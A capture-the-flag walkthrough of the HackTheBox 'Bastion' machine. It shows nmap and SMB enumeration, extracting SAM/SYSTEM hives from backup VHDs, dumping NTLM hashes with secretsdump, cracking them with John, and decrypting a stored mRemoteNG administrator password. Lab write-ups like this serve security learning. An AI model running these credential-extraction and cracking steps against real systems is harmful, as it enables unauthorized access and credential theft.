Windows Privilege Escalation-Stored Password in mRemoteNG
In this article, I will explain the Bastion room on HTB. This room was not hard; however, I spent a lot of time on it because the file I had to pull was about 5Gb. Let's start with port scanning with nmap. Since HTB machines are closed to ping scans, we use the -Pn switch.
nmap -Pn -sV 10.10.10.143
The open ports are 22, 135, 139 and 445.
The machine is Windows and, most probably, OpenSSH is running on this server.
Let's do an SMB enumeration with smbclient.
smbclient -L 10.10.10.134
I am looking at all of them since there may be a surprise. Not surprisingly, Backups has some shared data.
I am using smbclient again.
smbclient \\\\10.10.10.134\\Backups
There are 2 vhd files. These are virtual hard disk files, and they may be useful. I will pull them to my local machine. I tried to get these files but couldn't, so I mounted this share on my local machine by using,
mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
I could use guestmount, but it takes too much time and I got an error again and again. Thus, I pulled the vhd files to my Windows virtual machine by using a Python web server.
After some time, I got the disk files.
I move around the disk and find the SAM and SYSTEM files in the Windows\System32\Config folder of this machine. Then I moved those files by using scp,
scp SAM kali@192.168.253.130:/home/kali/HTB/Bastion
By using the SAM, SECURITY and SYSTEM files,
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
I got the NTLM hashes. I am using John to crack the passwords.
john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
I got the password for the L4mpje user. Let's make an SSH connection,
ssh L4mpje@10.10.10.134
Let's move around the folders. We see mRemoteNG. We can use this. Remote connection applications may create a vulnerability: they store credentials. I did some research and found the location where the passwords are stored.
C:\Users\L4mpje\Appdata\Roaming\mRemoteNG\confCons.xml
I am looking for some credentials. I have seen the administrator password hash. Bingo!
I am doing some research,
I have found this article,
and I am using
by
python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
I got the password. By using SSH, I connect to the machine and get the root flag.